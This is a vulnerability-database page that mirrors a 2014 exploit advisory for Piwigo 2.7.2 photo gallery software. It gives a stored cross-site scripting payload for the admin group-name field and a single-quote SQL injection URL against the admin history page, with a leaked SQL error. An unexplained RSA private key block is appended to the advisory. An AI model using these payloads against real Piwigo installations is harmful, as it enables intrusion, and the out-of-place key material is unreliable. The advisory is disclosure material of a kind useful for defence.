Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTaurus OmarPACKETSTORM:129665
HistoryDec 20, 2014 - 12:00 a.m.

Piwigo 2.7.2 Cross Site Scripting / SQL Injection

2014-12-2000:00:00
Taurus Omar
packetstormsecurity.com
25

0.892 High

EPSS

Percentile

98.5%

JSON
` -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
INDEPENDENT SECURITY RESEARCHER   
PENETRATION TESTING SECURITY  
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=  
  
  
# Exploit Title: Piwigo - SQL Injection / Cross Site Scripting Vulnerability's   
# Date: 19/12/2014  
# Url Vendor: http://www.piwigo.org/  
# Vendor Name: Piwigo   
# Version: 2.7.2  
# CVE: CVE-2014-1470  
# CVE References: CVE-2013-1468, CVE-2013-1469  
# Author: TaurusOmar   
# Tiwtter: @TaurusOmar_  
# Email: [email protected]  
# Home: overhat.blogspot.com  
# Tested On: Bugtraq Optimus  
# Risk: High  
  
  
Description  
Piwigo is a photo gallery software for the web that comes with powerful features to publish and manage your collection of pictures.  
  
  
------------------------  
+ CROSS SITE SCRIPTING +   
------------------------  
# Exploiting Description - Get into code xss in the box of group list.   
  
<fieldset>  
<legend>Add Group</legend><p>  
<strong>Name Group</strong><br>  
YOUR GROUP NAME O POC  
<input type="text" size="20" maxlength="50" name="groupname"></p>  
<p class="actionButtons">  
<input type="submit" value="Add" name="submit_add" class="submit">  
<a id="addGroupClose" href="#">Cancel</a></p>  
<input type="hidden" value="24322c55681c00da423a8a7b21b79640" name="pwg_token">  
</fieldset>  
  
#P0c  
"><img src=x onerror=prompt(1);>  
  
#Proof Concept  
http://i.imgur.com/qFyJz6q.jpg  
  
  
------------------------  
+ Sql Injection +  
------------------------  
# Exploiting Description - Sql Injection in control panel of admin and others users .   
  
#P0c  
http://site.com/piwigo/admin.php?page=history&search_id=5'  
  
SELECT  
date,  
time,  
user_id,  
IP,  
section,  
category_id,  
tag_ids,  
image_id,  
image_type  
FROM ucea_history  
WHERE   
; in /home/site.com/public_html/piwigo/include/dblayer/functions_mysqli.inc.php on line 830  
  
#Proof Concept  
http://i.imgur.com/wpzMmmu.jpg  
  
  
-----BEGIN RSA PRIVATE KEY-----  
MIICXQIBAAKBgQD995aYvrD2mK2fwwQr3FoAAprFLfMAiwR8cQUZW2XWDUSNJdvl  
Mq/1qym16+Yx7AVmXbsdCzqV/zeX+VUg6fUUWFwzNru6akjOlEHnSpNPxfJaCOEi  
2AFovRie8LJyXtmXf1VFVU7l33/OBUsGJAUa2H4bR8ChTUffSHqkoFLE5wIDAQAB  
AoGBANJgFc/RpqWfM7Pzx7DNh4AaqDpOJc19Wun6dU7b9y+pLe/+PHlP05Kdhp+8  
GaOg75gsbKNSeeVm1JZ/Y5UwOGJLn06W8PaBgkNG+b6tv9iRV7jSubEscwfGOXSX  
X5Hi9XP02MOrEsqOcgl6Xqpf8//fauhem8a4/iftk2hG3ngBAkEA/4C5QQePSOz/  
WyypDfUC5Nr5h32zq5bvRY++v7ydzeSRQD8uri66zZuz0gGTzjGdyBUb2OuTDT4R  
8RUcW1x9QQJBAP52GYGDg/+EE7ABX4zT/ZOHJScjlezxbwLiTsvWoESRUrQftLOL  
Wvl2IpeYpWvKIjTzyb5WH+IBWPFpM6RfsCcCQQDnqrDOrOsXhYSYB+uVMyYXmhEM  
8EYb/HQhj4+2THCNQoUNSvyphMduLJKkhTeei1B0HeetDRS9uh0Mika29CrBAkAM  
BVg/Hg9mSr8DWY1CAeHAzmma57t1bhJoeHhweLspghP+HmFS+gpaLpKDxtpJtUrY  
ZYvqSfdHnfitruKZqUuRAkAti8p7b53+cFSm14WPNtdhJQnxniUcSKBtNm5ExO7J  
X54eZI4iddc9xnP4rySfwz933FhMRF9Eh3gPUYAPBpp/  
-----END RSA PRIVATE KEY-----  
`

Related

exploitpack 2
exploitdb 2
nessus 2
zdt 2
packetstorm 1
securityvulns 2
openvas 1
htbridge 1
freebsd 1
zeroscience 1
prion 3
checkpoint_advisories 1
ubuntucve 2
cve 3
exploitpack
exploitpack
Piwigo 2.7.2 - Multiple Vulnerabilities
2014-12-19 00:00:00
Piwigo 2.4.6 - Multiple Vulnerabilities
2013-03-01 00:00:00
exploitdb
exploitdb
Piwigo 2.7.2 - Multiple Vulnerabilities
2014-12-19 00:00:00
Piwigo 2.4.6 - Multiple Vulnerabilities
2013-03-01 00:00:00
nessus
nessus
FreeBSD : piwigo -- CSRF/Path Traversal (edd201a5-8fc3-11e2-b131-000c299b62e1)
2013-03-20 00:00:00
Piwigo install.php dl Parameter Traversal Arbitrary File Access
2013-04-02 00:00:00
zdt
zdt
Piwigo 2.4.6 Cross Site Request Forgery / Traversal Vulnerabilities
2013-03-01 00:00:00
Piwigo 2.7.2 SQL Injection / Cross Site Scripting Vulnerabilities
2014-12-20 00:00:00
packetstorm
packetstorm
Piwigo 2.4.6 Cross Site Request Forgery / Traversal
2013-02-28 00:00:00
securityvulns
securityvulns
Multiple Vulnerabilities in Piwigo
2013-03-03 00:00:00
Web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2013-03-03 00:00:00
openvas
openvas
Piwigo Cross Site Request Forgery and Path Traversal Vulnerabilities
2013-03-21 00:00:00
htbridge
htbridge
Multiple Vulnerabilities in Piwigo
2013-02-06 00:00:00
freebsd
freebsd
piwigo -- CSRF/Path Traversal
2013-02-06 00:00:00
zeroscience
zeroscience
Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability
2013-02-18 00:00:00
prion
prion
Directory traversal
2013-03-13 20:55:00
Cross site request forgery (csrf)
2013-03-14 03:13:00
Design/Logic Flaw
2014-08-18 11:15:00
checkpoint_advisories
checkpoint_advisories
Piwigo Photo Gallery Project install script Directory Traversal - Ver2 (CVE-2013-1469)
2014-12-28 00:00:00
ubuntucve
ubuntucve
CVE-2013-1469
2013-03-13 00:00:00
CVE-2013-1468
2013-03-14 00:00:00
cve
cve
CVE-2013-1468
2013-03-14 03:13:00
CVE-2013-1469
2013-03-13 20:55:00
CVE-2014-1470
2014-08-18 11:15:00

0.892 High

EPSS

Percentile

98.5%

JSON
Related for PACKETSTORM:129665
exploitpack2exploitdb2nessus2zdt2packetstorm1securityvulns2openvas1htbridge1freebsd1zeroscience1prion3checkpoint_advisories1ubuntucve2cve3